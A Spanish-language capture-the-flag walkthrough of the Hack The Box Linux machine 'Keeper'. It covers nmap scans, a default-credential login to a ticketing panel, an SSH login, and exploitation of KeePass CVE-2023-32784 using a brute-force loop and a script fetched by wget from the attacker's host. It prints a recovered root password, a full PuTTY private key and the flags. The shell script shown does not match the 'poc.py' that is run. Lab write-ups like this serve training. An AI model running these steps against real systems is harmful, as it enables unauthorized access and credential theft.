Keeper

Sobre esta maquina: HTB

Sistema Operativo: Linux

Skills Usados:

  • Putty

  • ssh

  • rtg

  • kdbx

  • Abusing Sudoers

Metodologia:

Primer reconocimiento en nmap:

nmap -p- --open -sS -T4 -Pn -n 10.10.11.227 -oN First_Scann Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-28 22:11 EDT Stats: 0:00:39 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 80.95% done; ETC: 22:11 (0:00:09 remaining) Nmap scan report for 10.10.11.227 Host is up (0.15s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http

Escaneo de versiones y scripts:

nmap -p22,80 -n -sS -sVC 10.10.11.227 -oN sVC_Scann Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-28 22:12 EDT Nmap scan report for 10.10.11.227 Host is up (0.14s latency).

PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA) |_ 256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519)

80/tcp open http nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Site doesn't have a title (text/html). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.69 seconds

Vemos que corre en el puerto 80:

captura

Realizamos whatweb:

whatweb 10.10.11.227 http://10.10.11.227 [200 OK] Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.10.11.227], nginx[1.18.0]

Agregamos el dominio al Etc/host y nos aparece este panel:

captura

Logramos acceso con las credenciales por defecto root:password:

Captura

Conseguimos otro usuario dentro del sistema lnorgaard, Lise Nørgaard, norgaard@keeper.htb

captura

Conseguimos su password en el panel de ajustes Welcome2023!:

captura

Nos logeamos por ssh:

ssh lnorgaard@10.10.11.227 lnorgaard@10.10.11.227's password: Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)

  • Documentation: https://help.ubuntu.com

  • Management: https://landscape.canonical.com

  • Support: https://ubuntu.com/advantage You have mail. Last login: Tue Aug 8 11:31:22 2023 from 10.10.14.23 lnorgaard@keeper:~$

Estamos dentro ahora buscamos la primera flag:

lnorgaard@keeper:~$ ls RT30000.zip user.txt

lnorgaard@keeper:~$ cat user.txt

45576ec7f82edaf435390b73098252ac

Descomprimimos el archivo zip:

lnorgaard@keeper:~$ unzip RT30000.zipArchive: RT30000.zip inflating: KeePassDumpFull.dmp extracting: passcodes.kdbxlnorgaard@keeper:~$ ls

KeePassDumpFull.dmp passcodes.kdbx RT30000.zip user.txt

Vemos que contiene un keepass y un passcode y esta asociada a una vulnerabilidad, especificamente la CVE-2023-32784 asi que la explotaremos siguiendo lo conseguido en este repositorio:

https://github.com/vdohney/keepass-password-dumper

El contenido del script:

#!/bin/sh

Usage: ./keepass-pwn.sh Database.kdbx wordlist.txt (wordlist with 2 char)

while read i do echo "Using password: "$i"" echo "$i" | kpcli --kdb=$1 && exit 0 done < $2

Lo enviamos al amaquina victima:

nvim poc.py

ls

poc.py

Levantamos servidor python:

python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.11.227 - - [28/May/2025 22:50:00] "GET /poc.py HTTP/1.1" 200 -

descargamos el script:

lnorgaard@keeper:~$ wget http://10.10.14.11/poc.py --2025-05-29 04:49:52-- http://10.10.14.11/poc.py Connecting to 10.10.14.11:80... connected. HTTP request sent, awaiting response... 200 OK Length: 188 [text/x-python] Saving to: ‘poc.py’

poc.py 100%[=======================================================>] 188 --.-KB/s in 0s

2025-05-29 04:49:53 (16.4 MB/s) - ‘poc.py’ saved [188/188]

lnorgaard@keeper:~$ ls KeePassDumpFull.dmp passcodes.kdbx poc.py RT30000.zip user.txt

Ahora lo ejecutamos y veamos si resulta:

lnorgaard@keeper:~$ python3 poc.py KeePassDumpFull.dmp 2023-09-06 08:51:35,828 [.] [main] Opened KeePassDumpFull.dmp Possible password: ●,dgr●d med fl●de Possible password: ●ldgr●d med fl●de Possible password: ●`dgr●d med fl●de Possible password: ●-dgr●d med fl●de Possible password: ●'dgr●d med fl●de Possible password: ●]dgr●d med fl●de Possible password: ●Adgr●d med fl●de Possible password: ●Idgr●d med fl●de Possible password: ●:dgr●d med fl●de Possible password: ●=dgr●d med fl●de Possible password: ●_dgr●d med fl●de Possible password: ●cdgr●d med fl●de Possible password: ●Mdgr●d med fl●de

Despues de colocar el termino en google durante una hora consegui el postre rødgrød med fløde que coincide grandemente con el ulti password posible, admeas recordemos que el usuario Lnorgaard es de un pais en donde este tipo de postre es muy comun, Ahora podemos intentar ver si con esto podemos leer los passcodes:

kpcli:/passcodes/Network> show keeper.htb\ (Ticketing\ Server)

Path: /passcodes/Network/ Title: keeper.htb (Ticketing Server) Uname: root Pass: F4><3K0nd! URL: Notes: PuTTY-User-Key-File-3: ssh-rsa Encryption: none Comment: rsa-key-20230519 Public-Lines: 6 AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D 8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et Private-Lines: 14 AAABAQCB0dgBvETt8/UFNdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6j oDni1wZdo7hTpJ5ZjdmzwxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCih kmyZTZOV9eq1D6P1uB6AXSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputY f7n24kvL0WlBQThsiLkKcz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzT VkCew1DZuYnYOGQxHYW6WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivz UXjcCAviPpmSXB19UG8JlTpgORyhAAAAgQD2kfhSA+/ASrc04ZIVagCge1Qq8iWs OxG8eoCMW8DhhbvL6YKAfEvj3xeahXexlVwUOcDXO7Ti0QSV2sUw7E71cvl/ExGz in6qyp3R4yAaV7PiMtLTgBkqs4AA3rcJZpJb01AZB8TBK91QIZGOswi3/uYrIZ1r SsGN1FbK/meH9QAAAIEArbz8aWansqPtE+6Ye8Nq3G2R1PYhp5yXpxiE89L87NIV 09ygQ7Aec+C24TOykiwyPaOBlmMe+Nyaxss/gc7o9TnHNPFJ5iRyiXagT4E2WEEa xHhv1PDdSrE8tB9V8ox1kxBrxAvYIZgceHRFrwPrF823PeNWLC2BNwEId0G76VkA AACAVWJoksugJOovtA27Bamd7NRPvIa4dsMaQeXckVh19/TF8oZMDuJoiGyq6faD AF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGy NNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is= Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55c

Tenemos una Puttykey ahora intentaremos descifrarla en texto claro.

Guardamos, el contenido en un archivo de nombre key y despues usamos el siguiente comando:

puttygen key -O private-openssh -o id_rsa

chmod 600 id_rsa

Ahora nos logeamos al ssh con la id_rsa:

ssh -i id_rsa root@10.10.11.227 Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)

Documentation: https://help.ubuntu.com

Management: https://landscape.canonical.com

Support: https://ubuntu.com/advantage Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

You have new mail. Last login: Tue Aug 8 19:00:06 2023 from 10.10.14.41 root@keeper:~# whoami root

Estamos dentro, buscamos la ultima flag y damos por terminada esta maquina:

root@keeper: # ls root.txt RT30000.zip SQL root@keeper:# cat root.txt 264636cdd0b2b39fe022d649e68a82ce

PreviousKnifeNextNetmon

Last updated